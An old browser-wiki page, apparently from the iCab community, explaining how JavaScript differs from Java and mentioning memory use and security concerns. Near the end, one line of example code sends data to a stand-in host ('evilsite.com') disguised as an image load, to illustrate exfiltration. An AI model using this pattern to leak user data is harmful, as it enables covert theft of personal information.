What is JavaScript?

Well, first of all and most importantly, JavaScript is not Java! (As a matter of fact, about the only thing those two have in common are the first four letters of their names.)

Having said that, JavaScript is a client-side scripting technology that basically allows your browser's behaviour to be altered by web page authors (or, in fact, even by yourself). Note that JavaScript is sometimes named ECMAScript or InScript in iCab; you can ignore this difference since these three terms may be considered equal for all practical purposes.

iCab's extensive JavaScriptSettings allow customizing exactly what aspects of behaviours JavaScripts are allowed to change; blocking popup windows is only one example of iCab's capabilities.

-- ArneJohannessen

The difference between JavaScript and Java

JavaScript is a scripting language (a language used to control another system), designed for enhancing the Web. It provides for a range of facilities from validating and confirming form input (including things like Are you sure you wish to delete this item? messages) through to things like showing menu bars in Web pages and rollover animations, as well as very complex Web forms where parts of the form can be hidden, shown, added and removed all via script. The system that links Web page content to JavaScript is called the Document Object Model (DOM); sometimes, the term Dynamic HTML (DHTML) is used as well.

Java, on the other hand, usually with the addition of a GUI API such as AWT or Swing, is a complete software development environment, which can be used for writing proper software. Popular examples include instant messaging and chat room software and the LimeWire peer-to-peer client. The latter example is a fully fledged software package, but most people encounter Java software on the Web, where you can find what are called applets (mini-applications that run inside another application), which on the Web run inside Web pages. Anyone who's used ICQ2Go , AIM Express or the SlashNET Java IRC client has used Java. Whereas JavaScript is used to manipulate HTML content, Java software is fundamentally regular software like any other.

The distinction between the two from a user perspective is narrowing. The latest Web-based AIM chat client is now written in DHTML, not Java, and quite a few sites use Java for silly little things like animated buttons and page counters. The main difference still remains, though: the Java Virtual Machine (the system that runs Java software) is huge - Firefox eats up 100 extra Mb of RAM just to have the JVM running even with no Java applets active, which is insane. Generally on my Mac, Java software needs about 50 Mb, although Macintosh Runtime for Java (MRJ) for Mac OS 9 and earlier is very old. This, though, is why I refuse to run Java on either the Mac or the PC - I can't spare the RAM in Windows and on the Mac, iCab grinds the machine to a halt loading MRJ, and all my music cuts out during that process. All for what is usually a pointless little applet on someone's Web site.

JavaScript on the other hand is a very small system by comparison, but is also considered more of a threat. Code running in the Java Virtual Machine runs inside a sandbox - it is prevented from doing anything malicious to the system (except maybe from opening loads of windows and eating up memory); Java code is tightly guarded. There is little if any such protection with JavaScript, though. I still do not have a good idea, yet, though, of what actual threats JavaScript poses. Java could be a severe risk as it has the ability to open TCP connections to other machines, read your hard drive's contents, transmit sensitive data and perform anything else that regular software can, but Java applets in Web pages are prevented from doing so, thankfully. JavaScript has no such power, but it can nevertheless harvest the power of the Web browser to do its bidding, such as submitting forms and requesting items from sites with personal data sent as URL parameters, e. g. var img = new Image("http://evilsite.com/spy.asp?nasty-data=12345"); which would send the data 12345 to evilsite under the guise of caching an image to display as a rollover or something.

Either way, one has to be careful. JavaScript to me is more of an annoyance, mostly from those ghastly pop-ups. More so, are all the sites that insist on using JavaScript for all sorts of unnecessary uses such that turning it off for the sake of security renders some sites unusable (e.g. VersionTracker search, unless that's now fixed). Surfing with Java turned off is generally not a problem, except that the local bus company insists on using hideous Java applets for animated link buttons, rendering the site un-navigable without Java active. Unless I manually collect URLs from the HTML, at least....

The difference should, I hope, be clearer now?

-- DanielBeardsmore